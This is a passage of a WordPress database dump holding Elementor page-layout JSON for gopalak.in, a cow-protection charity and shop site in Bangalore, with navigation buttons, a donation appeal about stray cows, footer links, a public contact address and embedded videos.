ight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11962,1983,'_elementor_page_assets','a:0:{}'),(11965,1984,'_elementor_edit_mode','builder'),(11966,1984,'_elementor_template_type','wp-page'),(11967,1984,'_elementor_version','3.7.8'),(11968,1984,'_wp_page_template','elementor_canvas'),(11969,1984,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"b